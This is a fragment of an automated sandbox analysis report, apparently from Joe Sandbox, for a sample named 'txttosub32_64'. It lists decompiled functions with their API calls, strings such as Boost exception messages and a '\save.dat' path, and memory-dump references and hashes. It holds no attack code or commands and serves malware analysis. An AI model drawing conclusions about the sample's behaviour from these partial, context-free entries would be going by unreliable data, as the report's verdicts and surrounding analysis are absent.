                                                                                    • Part of subcall function 02DA3A8F: _malloc.LIBCMT ref: 02DA3AA7
                                                                                    • Part of subcall function 02D9D2F7: __EH_prolog.LIBCMT ref: 02D9D2FC
                                                                                  Strings
                                                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D9CD12
                                                                                  • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D9CD19
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_mallocstd::exception::exception
                                                                                  • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                  • API String ID: 1953324306-412195191
                                                                                  • Opcode ID: 6b1af141b3e5f4d6ff49df1fe243857c55bc92ec3c49200b0ba2d7dbf404665d
                                                                                  • Instruction ID: 6eb073f4e8f92fc040d07151440a122d7f8ff134ccda9f840a8decda26046f59
                                                                                  • Opcode Fuzzy Hash: 6b1af141b3e5f4d6ff49df1fe243857c55bc92ec3c49200b0ba2d7dbf404665d
                                                                                  • Instruction Fuzzy Hash: 40214A71E002589ADF04EFE9D854AEDBBBAEF15304F104159E806A7340DB709E44CBA1
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02D9535D
                                                                                    • Part of subcall function 02DA2EEC: __FF_MSGBANNER.LIBCMT ref: 02DA2F03
                                                                                    • Part of subcall function 02DA2EEC: __NMSG_WRITE.LIBCMT ref: 02DA2F0A
                                                                                    • Part of subcall function 02DA2EEC: RtlAllocateHeap.NTDLL(00A70000,00000000,00000001), ref: 02DA2F2F
                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D9536F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                  • String ID: \save.dat
                                                                                  • API String ID: 4128168839-3580179773
                                                                                  • Opcode ID: 61dbbfd96da50ec8f152bad0b66d069d3974cb9d962af1a2d606b1398b439552
                                                                                  • Instruction ID: 9d4077ef5edf23c156fee85219e4502e90b4f18ce62d474c1a634a582ad729d8
                                                                                  • Opcode Fuzzy Hash: 61dbbfd96da50ec8f152bad0b66d069d3974cb9d962af1a2d606b1398b439552
                                                                                  • Instruction Fuzzy Hash: 24113A72904244BBDF239E659CA4DAFFF6BDF82660F5441F9F88567302D6A20D06C6B0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9396A
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D939C1
                                                                                    • Part of subcall function 02D91410: std::exception::exception.LIBCMT ref: 02D91428
                                                                                    • Part of subcall function 02D9A551: __EH_prolog.LIBCMT ref: 02D9A556
                                                                                    • Part of subcall function 02D9A551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D9A565
                                                                                    • Part of subcall function 02D9A551: __CxxThrowException@8.LIBCMT ref: 02D9A584
                                                                                  Strings
                                                                                  • Day of month is not valid for year, xrefs: 02D939AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Day of month is not valid for year
                                                                                  • API String ID: 1404951899-1521898139
                                                                                  • Opcode ID: 0dc125bf0ace013efe2fe04117488dd6505f96ac67a6774c0948e28e6b54ab05
                                                                                  • Instruction ID: 87f4e721c718aa16e99f796e2e802e103c3ab2003c51f49ff4cf58b521f22710
                                                                                  • Opcode Fuzzy Hash: 0dc125bf0ace013efe2fe04117488dd6505f96ac67a6774c0948e28e6b54ab05
                                                                                  • Instruction Fuzzy Hash: 55019E7691420AEADF05EFA4D805AEEB779FF18710F40801AFC0593340EB748E55CBA5
                                                                                  APIs
                                                                                  • std::exception::exception.LIBCMT ref: 02D9FA4A
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D9FA5F
                                                                                    • Part of subcall function 02DA3A8F: _malloc.LIBCMT ref: 02DA3AA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 4063778783-2104205924
                                                                                  • Opcode ID: 17121bc2113d5a487f3d2a8c86027872b54a1c4e4ba52b7be734059b1432247d
                                                                                  • Instruction ID: 808075f62c4e208379c5103683c9e290bfde307be3123fc6a41a9376168d45e1
                                                                                  • Opcode Fuzzy Hash: 17121bc2113d5a487f3d2a8c86027872b54a1c4e4ba52b7be734059b1432247d
                                                                                  • Instruction Fuzzy Hash: 63F0897060430D9ADF04EA9598659AF73ADEB04255F60055AB926D2780EBF0EE04C594
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D93C1B
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 02D93C30
                                                                                    • Part of subcall function 02DA23F7: std::exception::exception.LIBCMT ref: 02DA2401
                                                                                    • Part of subcall function 02D9A58A: __EH_prolog.LIBCMT ref: 02D9A58F
                                                                                    • Part of subcall function 02D9A58A: __CxxThrowException@8.LIBCMT ref: 02D9A5B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 1300498068-3145022300
                                                                                  • Opcode ID: 70836e240cae8b16247ef9739159840627d156c82886e6b970d0885db69ad668
                                                                                  • Instruction ID: 52f2f49df92920b884eb926545daf85b9bd01b0b17efd29e561adb9934078d8d
                                                                                  • Opcode Fuzzy Hash: 70836e240cae8b16247ef9739159840627d156c82886e6b970d0885db69ad668
                                                                                  • Instruction Fuzzy Hash: 98F0A772900504CBCB0ADF58E450AEAB775EF51311F50406EED065B350CB729D46CAA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D938D2
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D938F1
                                                                                    • Part of subcall function 02D91410: std::exception::exception.LIBCMT ref: 02D91428
                                                                                    • Part of subcall function 02D988BF: _memmove.LIBCMT ref: 02D988DF
                                                                                  Strings
                                                                                  • Year is out of valid range: 1400..10000, xrefs: 02D938E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Year is out of valid range: 1400..10000
                                                                                  • API String ID: 3258419250-2344417016
                                                                                  • Opcode ID: 0eee0ce1989c84ad817bc39da256b2c7686a9608d7f9b196a51d622bfc2e579d
                                                                                  • Instruction ID: 53b3740d3000420b177aa733a312448d8c4b03db1f524b37c6b655c35045625b
                                                                                  • Opcode Fuzzy Hash: 0eee0ce1989c84ad817bc39da256b2c7686a9608d7f9b196a51d622bfc2e579d
                                                                                  • Instruction Fuzzy Hash: 88E09272E54104D7EB15EB989821BEDB769DF48710F00044AE402A7380DAB11D44CBA5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D93886
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D938A5
                                                                                    • Part of subcall function 02D91410: std::exception::exception.LIBCMT ref: 02D91428
                                                                                    • Part of subcall function 02D988BF: _memmove.LIBCMT ref: 02D988DF
                                                                                  Strings
                                                                                  • Day of month value is out of range 1..31, xrefs: 02D93894
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Day of month value is out of range 1..31
                                                                                  • API String ID: 3258419250-1361117730
                                                                                  • Opcode ID: 0f496deef1c5fbcabe46f662d5faf01e6056fc22e8b7d6f9dfda43fcfc212777
                                                                                  • Instruction ID: 38a85b267d43783894b76c376e6f3b5a49f963eb9d0c08f322a7a372dde1a79c
                                                                                  • Opcode Fuzzy Hash: 0f496deef1c5fbcabe46f662d5faf01e6056fc22e8b7d6f9dfda43fcfc212777
                                                                                  • Instruction Fuzzy Hash: A0E09A72E14204DBEB15AB989821BEDB77AEF48B10F40004AE802A3380DAB25D448BE5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9391E
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D9393D
                                                                                    • Part of subcall function 02D91410: std::exception::exception.LIBCMT ref: 02D91428
                                                                                    • Part of subcall function 02D988BF: _memmove.LIBCMT ref: 02D988DF
                                                                                  Strings
                                                                                  • Month number is out of range 1..12, xrefs: 02D9392C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Month number is out of range 1..12
                                                                                  • API String ID: 3258419250-4198407886
                                                                                  • Opcode ID: 6af538417b4457bfaacb3debeca57fb80c3e0eb9e4d94d1a6dec70e57551a5c4
                                                                                  • Instruction ID: e65c75417e4c89672ffe8e221560e151b20fd9396abb820f0b217fd64e968c9b
                                                                                  • Opcode Fuzzy Hash: 6af538417b4457bfaacb3debeca57fb80c3e0eb9e4d94d1a6dec70e57551a5c4
                                                                                  • Instruction Fuzzy Hash: 19E0D872E14108D7EB15BFD49821BEDB779DF18710F40005AE802A3380DAB11D44CBF5
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32 ref: 02D919CC
                                                                                  • GetLastError.KERNEL32 ref: 02D919D9
                                                                                    • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocErrorH_prologLast
                                                                                  • String ID: tss
                                                                                  • API String ID: 249634027-1638339373
                                                                                  • Opcode ID: a4f3939d7633b9c6c8261900fdddb4ca5369a2eca2d965e65e0a802cf602d37e
                                                                                  • Instruction ID: 8e98e80ebf28db44dc19932a0bcaaa4f9734cefee47a158aaf6f2a1f02df1b6f
                                                                                  • Opcode Fuzzy Hash: a4f3939d7633b9c6c8261900fdddb4ca5369a2eca2d965e65e0a802cf602d37e
                                                                                  • Instruction Fuzzy Hash: 55E04F32904211DB87017A78D81848BBBA4AA44235F108B66FCBA833D0EA309D108AD6
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D93BD8
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 02D93BED
                                                                                    • Part of subcall function 02DA23F7: std::exception::exception.LIBCMT ref: 02DA2401
                                                                                    • Part of subcall function 02D9A58A: __EH_prolog.LIBCMT ref: 02D9A58F
                                                                                    • Part of subcall function 02D9A58A: __CxxThrowException@8.LIBCMT ref: 02D9A5B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 1300498068-3145022300
                                                                                  • Opcode ID: f9ee7fb3b6083273691cce584ff96c6e7d583f3f83b135d275d57324f1183de4
                                                                                  • Instruction ID: a9a7eb79884020373b19e912dd41079800a8a80ef8a0bbae30c298e05a88c8f1
                                                                                  • Opcode Fuzzy Hash: f9ee7fb3b6083273691cce584ff96c6e7d583f3f83b135d275d57324f1183de4
                                                                                  • Instruction Fuzzy Hash: ABE01A71A04108DBCB0AEF54E561BBCB771EF15304F8080ADE9065B390CB319D56CEA5
                                                                                  APIs
                                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3499195154-0
                                                                                  • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                  • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                                                  • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                  • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19